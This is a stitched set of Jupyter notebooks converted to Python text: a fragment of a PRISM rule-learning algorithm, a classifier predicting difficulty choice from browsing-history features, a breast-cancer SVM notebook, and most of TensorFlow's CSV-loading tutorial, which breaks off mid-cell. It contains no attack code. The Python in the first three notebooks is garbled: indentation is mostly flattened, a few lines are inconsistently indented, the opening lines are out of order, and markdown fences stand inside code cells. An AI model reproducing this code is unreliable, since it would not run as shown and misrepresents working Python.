return real_best_rules[0]
        if real_best_rules[0].class_label is None:
return rule_list[0]
rule_list = real_best_rules
# -
# This function implements the algorithm to find the best rule from a given dataset. It works by iterating over all possible classes and attributes to find the combination with the best accuracy and coverage using only one condition.
# Then, if the rule does not have accuracy one, it calls _refine_rule_ to add conditions and obtain the best possible rule.
#
# The function accepts the data, a dataframe with all the unique attributes,
# the class name, the minimum allowed accuracy and coverage, and the class attributes we care about.
#
# If the resulting rule meets the minimum accuracy and coverage, it returns the rule;
# otherwise it returns None.
# +
def find_one_rule(data, un_data, columns_list, class_name, min_accuracy, min_coverage ,classAtt = []):
class_list = un_data[class_name].to_numpy().tolist()
if classAtt == []:
classAtt = class_list
Sbest_rules = Rule(None)
Sbest_rules.accuracy = -math.inf
Sbest_rules.coverage = -math.inf
best_rules = [Sbest_rules]
for x in classAtt:
for y in columns_list:
for z in un_data[y]:
flag = False
if pd.isnull(z):
continue
if isinstance(z, int) or isinstance(z, float):
flag = True
subset = data[(data[y] >= z) & (data[class_name] == x)]
all_subset = data[data[y] >= z]
truefalse = True
else:
subset = data[(data[y] == z) & (data[class_name] == x)]
all_subset = data[data[y] == z]
truefalse = None
temp_rule = makeRule(None, subset, all_subset, truefalse, y, z, min_coverage, x)
                if temp_rule is not None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if flag:
subset = data[(data[y] < z) & (data[class_name] == x)]
all_subset = data[data[y] < z]
temp_rule = makeRule(None, subset, all_subset, False, y, z, min_coverage, x)
                    if temp_rule is not None:
best_rules = compare(temp_rule, Sbest_rules, best_rules)
Sbest_rules = best_rules[0]
if best_rules[0].accuracy == 1 and best_rules[0].coverage >= min_coverage:
return best_rules[0]
rule = refine_rule(data, columns_list, best_rules, un_data, class_name, min_coverage)
if rule.accuracy >= min_accuracy and rule.coverage >= min_coverage:
return rule
return None
# -
# We call this function to actually find all the rules for a given dataset. _find_rules_ uses a loop to call _find_one_rule_ and get a single rule. After each rule it finds, it removes all the rows covered by that rule from the dataset. The loop continues until either the dataset is empty or there are no more rules to find, which happens when _find_one_rule_ returns None.
#
# The function accepts the data, a dataframe of unique attributes, the names of all attribute columns,
# the class name, the class attributes we care about, and the minimum accuracy and coverage.
#
# It returns a list with all the rules it can find.
def find_rules(data, un_data, columns_list, class_name, classAtt = [], min_accuracy = 1, min_coverage = 1):
rule_list = []
temp = Rule(None)
flag = 1
while(flag):
temp = find_one_rule(data, un_data, columns_list, class_name, min_accuracy, min_coverage , classAtt)
        if temp is None:
break
rule_list.append(temp)
data = data[~data.index.isin(temp.coverage_list)]
if data.empty:
flag = 0
return rule_list
# +
data_file = "contact_lenses.csv"
data = pd.read_csv(data_file)
data.drop(["id"], axis = 1, inplace = True)
data.columns
conditions = [ data['lenses type'].eq(1), data['lenses type'].eq(2), data['lenses type'].eq(3)]
choices = ["hard","soft","none"]
data['lenses type'] = np.select(conditions, choices)
# age groups
conditions = [ data['age'].eq(1), data['age'].eq(2), data['age'].eq(3)]
choices = ["young","medium","old"]
data['age'] = np.select(conditions, choices)
# spectacles
conditions = [ data['spectacles'].eq(1), data['spectacles'].eq(2)]
choices = ["nearsighted","farsighted"]
data['spectacles'] = np.select(conditions, choices)
# astigmatism
conditions = [ data['astigmatism'].eq(1), data['astigmatism'].eq(2)]
choices = ["no","yes"]
data['astigmatism'] = np.select(conditions, choices)
# tear production rate
conditions = [ data['tear production rate'].eq(1), data['tear production rate'].eq(2)]
choices = ["reduced","normal"]
data['tear production rate'] = np.select(conditions, choices)
class_labels = []
rule_list = []
min_accuracy = 1
min_coverage = 1
(unique, columns_list, class_name) = parse(data)
rule_list = find_rules(data, unique, columns_list, class_name, class_labels, min_accuracy, min_coverage )
for x in rule_list:
print(x, "\n")
# -
|
PRiSM_algorithm.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import csv
import lzstring
from collections import namedtuple, Counter
import json
from memoize import memoize
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
# +
# [num unique urls, num unique urls typed, total visits, total typed, first visit time, last visit time]
domaininfo = namedtuple('domaininfo', ['num_unique_urls', 'num_unique_urls_typed', 'total_visits', 'total_typed', 'first_visit_time', 'last_visit_time'])
decompressFromEncodedURIComponent = lzstring.LZString().decompressFromEncodedURIComponent
#filepath = 'difficultyselectionexp_may31_11am.csv'
filepath = 'difficultyselectionexp_june25_9pm.csv'
reader = csv.DictReader(open(filepath))
def extract_domain_visit_info(domain_visit_info_compressed):
domain_visit_info = json.loads(decompressFromEncodedURIComponent(domain_visit_info_compressed))
output = {}
for k,v in domain_visit_info.items():
linedata = domaininfo(*v)
output[k] = linedata
return output
alldata = []
for alldata_item in reader:
if alldata_item['selected_difficulty'] not in ['nothing', 'easy', 'medium', 'hard']:
continue
    if not alldata_item['domain_visit_info_compressed']:
continue
alldata_item['domain_visit_info'] = extract_domain_visit_info(alldata_item['domain_visit_info_compressed'])
alldata.append(alldata_item)
# -
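# The `domaininfo(*v)` unpacking above turns each six-element list from the decompressed JSON into a named record. A toy illustration with made-up values (the real values come from the compressed browsing history):

```python
from collections import namedtuple

domaininfo = namedtuple('domaininfo', ['num_unique_urls', 'num_unique_urls_typed',
                                       'total_visits', 'total_typed',
                                       'first_visit_time', 'last_visit_time'])

# Made-up decoded payload for one domain.
raw = {"example.com": [12, 3, 40, 5, 1526000000000, 1561500000000]}

# Unpack each list positionally into the named record.
info = {domain: domaininfo(*values) for domain, values in raw.items()}
print(info["example.com"].total_visits)
```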
training_data = alldata[:round(len(alldata)*0.8)]
test_data = alldata[round(len(alldata)*0.8):]
print(len(training_data))
print(len(test_data))
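# The 80/20 split above slices the rows in file order, so any ordering in the CSV leaks into the split. A hedged sketch (an addition, not part of the original pipeline) that shuffles with a fixed seed first:

```python
import random

records = list(range(10))  # stand-in for alldata

rng = random.Random(42)    # fixed seed so the split is reproducible
shuffled = records[:]      # copy so the original order is preserved
rng.shuffle(shuffled)

cut = round(len(shuffled) * 0.8)
train, test = shuffled[:cut], shuffled[cut:]
print(len(train), len(test))
```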
# +
def extract_labels_alldata(data):
return np.array([line['selected_difficulty'] for line in data])
@memoize
def get_most_common_label():
label_to_count = Counter()
for line in training_data:
label = line['selected_difficulty']
label_to_count[label] += 1
sorted_by_count = sorted(label_to_count.items(), key=lambda x: x[1], reverse=True)
return sorted_by_count[0][0]
@memoize
def get_most_visited_domains():
domain_to_num_visits = Counter()
for line in training_data:
domain_visit_info = line['domain_visit_info']
for domain,info in domain_visit_info.items():
domain_to_num_visits[domain] += info.total_visits
sorted_by_num_visits = sorted(domain_to_num_visits.items(), key=lambda x: x[1], reverse=True)
return [x[0] for x in sorted_by_num_visits[:100]]
@memoize
def get_most_common_domains():
domain_to_num_visits = Counter()
for line in training_data:
domain_visit_info = line['domain_visit_info']
for domain,info in domain_visit_info.items():
domain_to_num_visits[domain] += 1
sorted_by_num_visits = sorted(domain_to_num_visits.items(), key=lambda x: x[1], reverse=True)
return [x[0] for x in sorted_by_num_visits[:100]]
def get_num_visits_for_domain(domain_visit_info, domain):
info = domain_visit_info.get(domain, None)
    if info is not None:
return info.total_visits
return 0
def extract_features_for_user(domain_visit_info):
domains = get_most_common_domains()
    visits_for_domains = np.array([get_num_visits_for_domain(domain_visit_info, x) for x in domains])
    total = np.sum(visits_for_domains)
    if total > 0:  # guard: a user may have visited none of the common domains
        visits_for_domains = visits_for_domains / total
    return visits_for_domains
def extract_features_alldata(data):
output = []
for line in data:
domain_visit_info = line['domain_visit_info']
features = extract_features_for_user(domain_visit_info)
output.append(features)
return np.array(output)
# +
def get_percent_correct(predicted_labels, actual_labels):
if len(predicted_labels) != len(actual_labels):
        raise ValueError('predicted and actual labels must have the same length')
total = len(actual_labels)
correct = 0
for p,a in zip(predicted_labels, actual_labels):
if p == a:
correct += 1
return correct / total
def test_baseline_classifier():
most_common_label = get_most_common_label()
predictions = [most_common_label for line in test_data]
actual = extract_labels_alldata(test_data)
percent_correct = get_percent_correct(predictions, actual)
print('baseline classifier accuracy:', percent_correct)
def test_classifier(clf, name=None):
    actual = extract_labels_alldata(test_data)
    features_test = extract_features_alldata(test_data)
    predictions = clf.predict(features_test)
    percent_correct = get_percent_correct(predictions, actual)
    print(name + ' classifier testing accuracy:', percent_correct)
def training_error_classifier(clf, name=None):
    actual = extract_labels_alldata(training_data)
    features_train = extract_features_alldata(training_data)
    predictions = clf.predict(features_train)
    percent_correct = get_percent_correct(predictions, actual)
    print(name + ' classifier training accuracy:', round(percent_correct, 2))
def to_int_categorical(dt):
# {'easy', 'hard', 'medium', 'nothing'}
cat_dt = []
for item in dt:
if item == 'nothing':
cat_dt.append(0)
elif item == 'easy':
cat_dt.append(1)
elif item == 'medium':
cat_dt.append(2)
else:
cat_dt.append(3)
return np.array(cat_dt)
test_baseline_classifier()
# +
labels_train = extract_labels_alldata(training_data)
features_train = extract_features_alldata(training_data)
clf = RandomForestClassifier(max_depth=10, random_state=0)
clf.fit(features_train, labels_train)
test_classifier(clf, 'RF')
clf = KNeighborsClassifier(n_neighbors=3, p=1)
clf.fit(features_train, labels_train)
test_classifier(clf, 'KNN')
# +
import keras
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils import to_categorical
labels_test = to_categorical(to_int_categorical(extract_labels_alldata(test_data)), num_classes=4)
features_test = extract_features_alldata(test_data)
labels_train = to_categorical(to_int_categorical(extract_labels_alldata(training_data)), num_classes=4)
features_train = extract_features_alldata(training_data)
model = Sequential()
model.add(Dense(100, activation='relu', input_dim=100))
model.add(Dropout(0.5))
model.add(Dense(50, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(4, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
model.fit(features_train, labels_train,
epochs=100,
batch_size=32)
score = model.evaluate(features_test, labels_test, batch_size=32)
predictions = model.predict(features_test, batch_size=32)
print(predictions)
print(labels_test)
print(score)
# -
|
predict difficulty choice.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#import required libraries
import pandas as pd
import numpy as np
#import seaborn as sns
import sklearn
import matplotlib.pyplot as plt
from matplotlib import style
style.use("ggplot")
#importing the dataset
data=pd.read_csv(r"F:\Datasets\data.csv")
data
data=data.fillna(0)
cols=['id']
data=data.drop(cols,axis=1)
data
data=data.drop('Unnamed: 32',axis=1)
data
data.dtypes
diagnosis=np.unique(data['diagnosis'])
diagnosis
def map_diagnosis(diagnosis):
if diagnosis=='M':
return 1
else:
return 0
data['diagnosis']=data['diagnosis'].apply(map_diagnosis)
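# The same binary encoding can be written more compactly with `Series.map` (shown on a toy column; values absent from the mapping become NaN, so it is stricter than the `else: 0` branch above):

```python
import pandas as pd

diagnosis = pd.Series(["M", "B", "B", "M"])
# Map each label to its integer code.
encoded = diagnosis.map({"M": 1, "B": 0})
print(encoded.tolist())
```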
y=data['diagnosis']
x=data
x=x.drop('diagnosis',axis=1)
# +
# x=np.array(x)
# x
# +
# y=np.array(y)
# y
# -
from sklearn.model_selection import train_test_split
xtrain,xtest,ytrain,ytest=train_test_split(x,y,test_size=.2)
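# With an imbalanced label like `diagnosis`, passing `stratify` keeps the class ratio the same in both folds. A self-contained sketch with synthetic data (the names mirror the split above, but the data is made up):

```python
import numpy as np
from sklearn.model_selection import train_test_split

x_demo = np.arange(100).reshape(-1, 1)
y_demo = np.array([1] * 30 + [0] * 70)  # 30% positive, like an imbalanced label

# stratify=y_demo preserves the 30/70 ratio in both folds.
xtr, xte, ytr, yte = train_test_split(
    x_demo, y_demo, test_size=0.2, stratify=y_demo, random_state=0
)
print(ytr.mean(), yte.mean())
```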
from sklearn import svm
clf=svm.SVC(kernel='linear')  # keep the sklearn.svm module name unshadowed
clf.fit(xtrain,ytrain)
ypred=clf.predict(xtest)
ypred
ytest
# +
# w = clf.coef_[0]
# print(w)
# a = -w[0] / w[1]
# xx = np.linspace(0,12)
# yy = a * xx - clf.intercept_[0] / w[1]
# h0 = plt.plot(xx, yy, 'k-', label="non weighted div")
# plt.scatter(xtrain.iloc[:, 0], xtrain.iloc[:, 1], c = ytrain)
# plt.legend()
# plt.show()
# -
from sklearn import metrics
print("Accuracy:",metrics.accuracy_score(ytest, ypred))
print("Precision:",metrics.precision_score(ytest, ypred))
print("Recall:",metrics.recall_score(ytest, ypred))
mse=sklearn.metrics.mean_squared_error(ytest,ypred)
print(mse)
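# Accuracy, precision, and recall can hide where the errors fall; `metrics.confusion_matrix` shows the breakdown directly. A minimal example with made-up labels (not the model's actual predictions):

```python
from sklearn import metrics

y_true = [0, 0, 1, 1, 1, 0]
y_pred = [0, 1, 1, 1, 0, 0]

cm = metrics.confusion_matrix(y_true, y_pred)
print(cm)
# Rows are actual classes, columns are predicted classes:
# [[TN FP]
#  [FN TP]]
```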
# +
# import pickle
# pickle.dump(svm, open('F:\\Datasets\\brestSVM.pkl','wb'))
# # Loading model to compare the results
# model = pickle.load(open('F:\\Datasets\\brestSVM.pkl','rb'))
# -
|
BreastCancerSVM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="DweYe9FcbMK_"
# ##### Copyright 2019 The TensorFlow Authors.
#
# + cellView="form" id="AVV2e0XKbJeX"
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] id="sUtoed20cRJJ"
# # Load CSV data
# + [markdown] id="1ap_W4aQcgNT"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
# </td>
# <td>
# <a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
# </td>
# </table>
# + [markdown] id="C-3Xbt0FfGfs"
# This tutorial provides examples of how to use CSV data with TensorFlow.
#
# There are two main parts to this:
#
# 1. **Loading the data off disk**
# 2. **Pre-processing it into a form suitable for training.**
#
# This tutorial focuses on the loading, and gives some quick examples of preprocessing. For a tutorial that focuses on the preprocessing aspect see the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](https://www.tensorflow.org/tutorials/structured_data/preprocessing_layers).
#
# + [markdown] id="fgZ9gjmPfSnK"
# ## Setup
# + id="baYFZMW_bJHh"
import pandas as pd
import numpy as np
# Make numpy values easier to read.
np.set_printoptions(precision=3, suppress=True)
import tensorflow as tf
from tensorflow.keras import layers
# + [markdown] id="1ZhJYbJxHNGJ"
# ## In memory data
# + [markdown] id="ny5TEgcmHjVx"
# For any small CSV dataset the simplest way to train a TensorFlow model on it is to load it into memory as a pandas Dataframe or a NumPy array.
#
# + [markdown] id="LgpBOuU8PGFf"
# A relatively simple example is the [abalone dataset](https://archive.ics.uci.edu/ml/datasets/abalone).
#
# * The dataset is small.
# * All the input features are limited-range floating point values.
#
# Here is how to download the data into a [Pandas `DataFrame`](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.html):
# + id="IZVExo9DKoNz"
abalone_train = pd.read_csv(
"https://storage.googleapis.com/download.tensorflow.org/data/abalone_train.csv",
names=["Length", "Diameter", "Height", "Whole weight", "Shucked weight",
"Viscera weight", "Shell weight", "Age"])
abalone_train.head()
# + [markdown] id="hP22mdyPQ1_t"
# The dataset contains a set of measurements of [abalone](https://en.wikipedia.org/wiki/Abalone), a type of sea snail.
#
# 
#
# [“Abalone shell”](https://www.flickr.com/photos/thenickster/16641048623/) (by [<NAME>](https://www.flickr.com/photos/thenickster/), CC BY-SA 2.0)
#
# + [markdown] id="vlfGrk_9N-wf"
# The nominal task for this dataset is to predict the age from the other measurements, so separate the features and labels for training:
#
# + id="udOnDJOxNi7p"
abalone_features = abalone_train.copy()
abalone_labels = abalone_features.pop('Age')
# + [markdown] id="seK9n71-UBfT"
# For this dataset you will treat all features identically. Pack the features into a single NumPy array:
# + id="Dp3N5McbUMwb"
abalone_features = np.array(abalone_features)
abalone_features
# + [markdown] id="1C1yFOxLOdxh"
# Next, make a regression model to predict the age. Since there is only a single input tensor, a `keras.Sequential` model is sufficient here.
# + id="d8zzNrZqOmfB"
abalone_model = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
# + [markdown] id="j6IWeP78O2wE"
# To train that model, pass the features and labels to `Model.fit`:
# + id="uZdpCD92SN3Z"
abalone_model.fit(abalone_features, abalone_labels, epochs=10)
# + [markdown] id="GapLOj1OOTQH"
# You have just seen the most basic way to train a model using CSV data. Next, you will learn how to apply preprocessing to normalize numeric columns.
# + [markdown] id="B87Rd1SOUv02"
# ## Basic preprocessing
# + [markdown] id="yCrB2Jd-U0Vt"
# It's good practice to normalize the inputs to your model. The Keras preprocessing layers provide a convenient way to build this normalization into your model.
#
# The layer will precompute the mean and variance of each column, and use these to normalize the data.
#
# First you create the layer:
# + id="H2WQpDU5VRk7"
normalize = layers.Normalization()
# + [markdown] id="hGgEZE-7Vpt6"
# Then you use the `Normalization.adapt()` method to adapt the normalization layer to your data.
#
# Note: Only use your training data to `.adapt()` preprocessing layers. Do not use your validation or test data.
# + id="2WgOPIiOVpLg"
normalize.adapt(abalone_features)
# + [markdown] id="rE6vh0byV7cE"
# Then use the normalization layer in your model:
# + id="quPcZ9dTWA9A"
norm_abalone_model = tf.keras.Sequential([
normalize,
layers.Dense(64),
layers.Dense(1)
])
norm_abalone_model.compile(loss = tf.losses.MeanSquaredError(),
optimizer = tf.optimizers.Adam())
norm_abalone_model.fit(abalone_features, abalone_labels, epochs=10)
# + [markdown] id="Wuqj601Qw0Ml"
# ## Mixed data types
#
# The "Titanic" dataset contains information about the passengers on the Titanic. The nominal task on this dataset is to predict who survived.
#
# 
#
# Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:RMS_Titanic_3.jpg)
#
# The raw data can easily be loaded as a Pandas `DataFrame`, but is not immediately usable as input to a TensorFlow model.
#
# + id="GS-dBMpuYMnz"
titanic = pd.read_csv("https://storage.googleapis.com/tf-datasets/titanic/train.csv")
titanic.head()
# + id="D8rCGIK1ZzKx"
titanic_features = titanic.copy()
titanic_labels = titanic_features.pop('survived')
# + [markdown] id="urHOwpCDYtcI"
# Because of the different data types and ranges, you can't simply stack the features into a NumPy array and pass it to a `keras.Sequential` model. Each column needs to be handled individually.
#
# As one option, you could preprocess your data offline (using any tool you like) to convert categorical columns to numeric columns, then pass the processed output to your TensorFlow model. The disadvantage to that approach is that if you save and export your model the preprocessing is not saved with it. The Keras preprocessing layers avoid this problem because they're part of the model.
#
# + [markdown] id="Bta4Sx0Zau5v"
# In this example, you'll build a model that implements the preprocessing logic using [Keras functional API](https://www.tensorflow.org/guide/keras/functional). You could also do it by [subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models).
#
# The functional API operates on "symbolic" tensors. Normal "eager" tensors have a value. In contrast, these "symbolic" tensors do not. Instead they keep track of which operations are run on them, and build a representation of the calculation that you can run later. Here's a quick example:
# + id="730F16_97D-3"
# Create a symbolic input
input = tf.keras.Input(shape=(), dtype=tf.float32)
# Perform a calculation using the input
result = 2*input + 1
# the result doesn't have a value
result
# + id="RtcNXWB18kMJ"
calc = tf.keras.Model(inputs=input, outputs=result)
# + id="fUGQOUqZ8sa-"
print(calc(1).numpy())
print(calc(2).numpy())
# + [markdown] id="rNS9lT7f6_U2"
# To build the preprocessing model, start by building a set of symbolic `keras.Input` objects, matching the names and data-types of the CSV columns.
# + id="5WODe_1da3yw"
inputs = {}
for name, column in titanic_features.items():
dtype = column.dtype
if dtype == object:
dtype = tf.string
else:
dtype = tf.float32
inputs[name] = tf.keras.Input(shape=(1,), name=name, dtype=dtype)
inputs
# + [markdown] id="aaheJFmymq8l"
# The first step in your preprocessing logic is to concatenate the numeric inputs together, and run them through a normalization layer:
# + id="wPRC_E6rkp8D"
numeric_inputs = {name:input for name,input in inputs.items()
if input.dtype==tf.float32}
x = layers.Concatenate()(list(numeric_inputs.values()))
norm = layers.Normalization()
norm.adapt(np.array(titanic[numeric_inputs.keys()]))
all_numeric_inputs = norm(x)
all_numeric_inputs
# + [markdown] id="-JoR45Uj712l"
# Collect all the symbolic preprocessing results, to concatenate them later.
# + id="M7jIJw5XntdN"
preprocessed_inputs = [all_numeric_inputs]
# + [markdown] id="r0Hryylyosfm"
# For the string inputs use the `tf.keras.layers.StringLookup` function to map from strings to integer indices in a vocabulary. Next, use `tf.keras.layers.CategoryEncoding` to convert the indexes into `float32` data appropriate for the model.
#
# The default settings for the `tf.keras.layers.CategoryEncoding` layer create a one-hot vector for each input. A `layers.Embedding` would also work. See the [preprocessing layers guide](https://www.tensorflow.org/guide/keras/preprocessing_layers#quick_recipes) and [tutorial](../structured_data/preprocessing_layers.ipynb) for more on this topic.
# + id="79fi1Cgan2YV"
for name, input in inputs.items():
if input.dtype == tf.float32:
continue
lookup = layers.StringLookup(vocabulary=np.unique(titanic_features[name]))
one_hot = layers.CategoryEncoding(max_tokens=lookup.vocab_size())
x = lookup(input)
x = one_hot(x)
preprocessed_inputs.append(x)
# + [markdown] id="Wnhv0T7itnc7"
# With the collection of `inputs` and `preprocessed_inputs`, you can concatenate all the preprocessed inputs together and build a model that handles the preprocessing:
# + id="XJRzUTe8ukXc"
preprocessed_inputs_cat = layers.Concatenate()(preprocessed_inputs)
titanic_preprocessing = tf.keras.Model(inputs, preprocessed_inputs_cat)
tf.keras.utils.plot_model(model = titanic_preprocessing , rankdir="LR", dpi=72, show_shapes=True)
# + [markdown] id="PNHxrNW8vdda"
# This `model` just contains the input preprocessing. You can run it to see what it does to your data. Keras models don't automatically convert Pandas `DataFrames` because it's not clear if it should be converted to one tensor or to a dictionary of tensors. So convert it to a dictionary of tensors:
# + id="5YjdYyMEacwQ"
titanic_features_dict = {name: np.array(value)
for name, value in titanic_features.items()}
# + [markdown] id="0nKJYoPByada"
# Slice out the first training example and pass it to this preprocessing model; you will see the numeric features and string one-hots all concatenated together:
# + id="SjnmU8PSv8T3"
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
titanic_preprocessing(features_dict)
# + [markdown] id="qkBf4LvmzMDp"
# Now build the model on top of this:
# + id="coIPtGaCzUV7"
def titanic_model(preprocessing_head, inputs):
body = tf.keras.Sequential([
layers.Dense(64),
layers.Dense(1)
])
preprocessed_inputs = preprocessing_head(inputs)
result = body(preprocessed_inputs)
model = tf.keras.Model(inputs, result)
model.compile(loss=tf.losses.BinaryCrossentropy(from_logits=True),
optimizer=tf.optimizers.Adam())
return model
titanic_model = titanic_model(titanic_preprocessing, inputs)
# + [markdown] id="LK5uBQQF2KbZ"
# When you train the model, pass the dictionary of features as `x`, and the label as `y`.
# + id="D1gVfwJ61ejz"
titanic_model.fit(x=titanic_features_dict, y=titanic_labels, epochs=10)
# + [markdown] id="LxgJarZk3bfH"
# Since the preprocessing is part of the model, you can save the model and reload it somewhere else and get identical results:
# + id="Ay-8ymNA2ZCh"
titanic_model.save('test')
reloaded = tf.keras.models.load_model('test')
# + id="Qm6jMTpD20lK"
features_dict = {name:values[:1] for name, values in titanic_features_dict.items()}
before = titanic_model(features_dict)
after = reloaded(features_dict)
assert abs(before - after) < 1e-3
print(before)
print(after)
# + [markdown] id="7VsPlxIRZpXf"
# ## Using tf.data
#
# + [markdown] id="NyVDCwGzR5HW"
# In the previous section you relied on the model's built-in data shuffling and batching while training the model.
#
# If you need more control over the input data pipeline, or need to use data that doesn't easily fit into memory, use `tf.data`.
#
# For more examples see the [tf.data guide](../../guide/data.ipynb).
# + [markdown] id="gP5Y1jM2Sor0"
# ### In-memory data
#
# As a first example of applying `tf.data` to CSV data consider the following code to manually slice up the dictionary of features from the previous section. For each index, it takes that index for each feature:
#
# + id="i8wE-MVuVu7_"
import itertools
def slices(features):
for i in itertools.count():
# For each feature take index `i`
example = {name:values[i] for name, values in features.items()}
yield example
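The same generator can be exercised on a plain dictionary of lists (a toy stand-in for `titanic_features_dict`), taking just the first two examples with `itertools.islice`:

```python
import itertools

def slices(features):
    # Yield one example per index: {feature_name: value_at_index_i}
    for i in itertools.count():
        yield {name: values[i] for name, values in features.items()}

toy = {"age": [22, 38, 26], "fare": [7.25, 71.28, 7.92]}
first_two = list(itertools.islice(slices(toy), 2))
print(first_two)
```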
# + [markdown] id="cQ3RTbS9YEal"
# Run this and print the first example:
# + id="Wwq8XK88WwFk"
for example in slices(titanic_features_dict):
for name, value in example.items():
print(f"{name:19s}: {value}")
break
# + [markdown] id="vvp8Dct6YOIE"
# The most basic `tf.data.Dataset` in-memory data loader is the `Dataset.from_tensor_slices` constructor. This returns a `tf.data.Dataset` that implements a generalized version of the above `slices` function, in TensorFlow.
# + id="2gEJthslYxeV"
features_ds = tf.data.Dataset.from_tensor_slices(titanic_features_dict)
# + [markdown] id="-ZC0rTpMZMZK"
# You can iterate over a `tf.data.Dataset` like any other python iterable:
# + id="gOHbiefaY4ag"
for example in features_ds:
for name, value in example.items():
print(f"{name:19s}: {value}")
break
# + [markdown] id="uwcFoVJWZY5F"
# The `from_tensor_slices` function can handle any structure of nested dictionaries or tuples. The following code makes a dataset of `(features_dict, labels)` pairs:
# + id="xIHGBy76Zcrx"
titanic_ds = tf.data.Dataset.from_tensor_slices((titanic_features_dict, titanic_labels))
# + [markdown] id="gQwxitt8c2GK"
# To train a model using this `Dataset`, you'll need to at least `shuffle` and `batch` the data.
# + id="SbJcbldhddeC"
titanic_batches = titanic_ds.shuffle(len(titanic_labels)).batch(32)
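What `shuffle(...).batch(32)` does can be modeled in plain Python: shuffle within a buffer at least as large as the dataset (a full shuffle here), then emit fixed-size batches, with a possibly short final batch. A simplified sketch, not TensorFlow's streaming implementation:

```python
import random

def shuffle_and_batch(examples, batch_size, seed=0):
    # Simplified model of Dataset.shuffle(len(data)).batch(batch_size):
    # full shuffle, then slice into consecutive fixed-size batches.
    shuffled = list(examples)
    random.Random(seed).shuffle(shuffled)
    return [shuffled[i:i + batch_size] for i in range(0, len(shuffled), batch_size)]

batches = shuffle_and_batch(range(10), batch_size=3)
print([len(b) for b in batches])  # three full batches and one short one
```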
# + [markdown] id="-4FRqhRFuoJx"
# Instead of passing `features` and `labels` to `Model.fit`, you pass the dataset:
# + id="8yXkNPumdBtB"
titanic_model.fit(titanic_batches, epochs=5)
# + [markdown] id="qXuibiv9exT7"
# ### From a single file
#
# So far this tutorial has worked with in-memory data. `tf.data` is a highly scalable toolkit for building data pipelines, and provides a few functions for loading CSV files.
# + id="Ncf5t6tgL5ZI"
titanic_file_path = tf.keras.utils.get_file("train.csv", "https://storage.googleapis.com/tf-datasets/titanic/train.csv")
# + [markdown] id="t4N-plO4tDXd"
# Now read the CSV data from the file and create a `tf.data.Dataset`.
#
# (For the full documentation, see `tf.data.experimental.make_csv_dataset`)
#
# + id="yIbUscB9sqha"
titanic_csv_ds = tf.data.experimental.make_csv_dataset(
titanic_file_path,
batch_size=5, # Artificially small to make examples easier to show.
label_name='survived',
num_epochs=1,
ignore_errors=True,)
# + [markdown] id="Sf3v3BKgy4AG"
# This function includes many convenient features, so the data is easy to work with, including:
#
# * Using the column headers as dictionary keys.
# * Automatically determining the type of each column.
# + id="v4oMO9MIxgTG"
for batch, label in titanic_csv_ds.take(1):
for key, value in batch.items():
print(f"{key:20s}: {value}")
print()
print(f"{'label':20s}: {label}")
# + [markdown] id="k-TgA6o2Ja6U"
# Note: if you run the above cell twice it will produce different results. The default settings for `make_csv_dataset` include `shuffle_buffer_size=1000`, which is more than sufficient for this small dataset, but may not be for a real-world dataset.
# + [markdown] id="d6uviU_KCCWD"
# It can also decompress the data on the fly. Here's a gzipped CSV file containing the [metro interstate traffic dataset](https://archive.ics.uci.edu/ml/datasets/Metro+Interstate+Traffic+Volume)
#
# 
#
# Image [from Wikimedia](https://commons.wikimedia.org/wiki/File:Trafficjam.jpg)
#
# + id="kT7oZI2E46Q8"
traffic_volume_csv_gz = tf.keras.utils.get_file(
'Metro_Interstate_Traffic_Volume.csv.gz',
"https://archive.ics.uci.edu/ml/machine-learning-databases/00492/Metro_Interstate_Traffic_Volume.csv.gz",
cache_dir='.', cache_subdir='traffic')
# + [markdown] id="F-IOsFHbCw0i"
# Set the `compression_type` argument to read directly from the compressed file:
# + id="ar0MPEVJ5NeA"
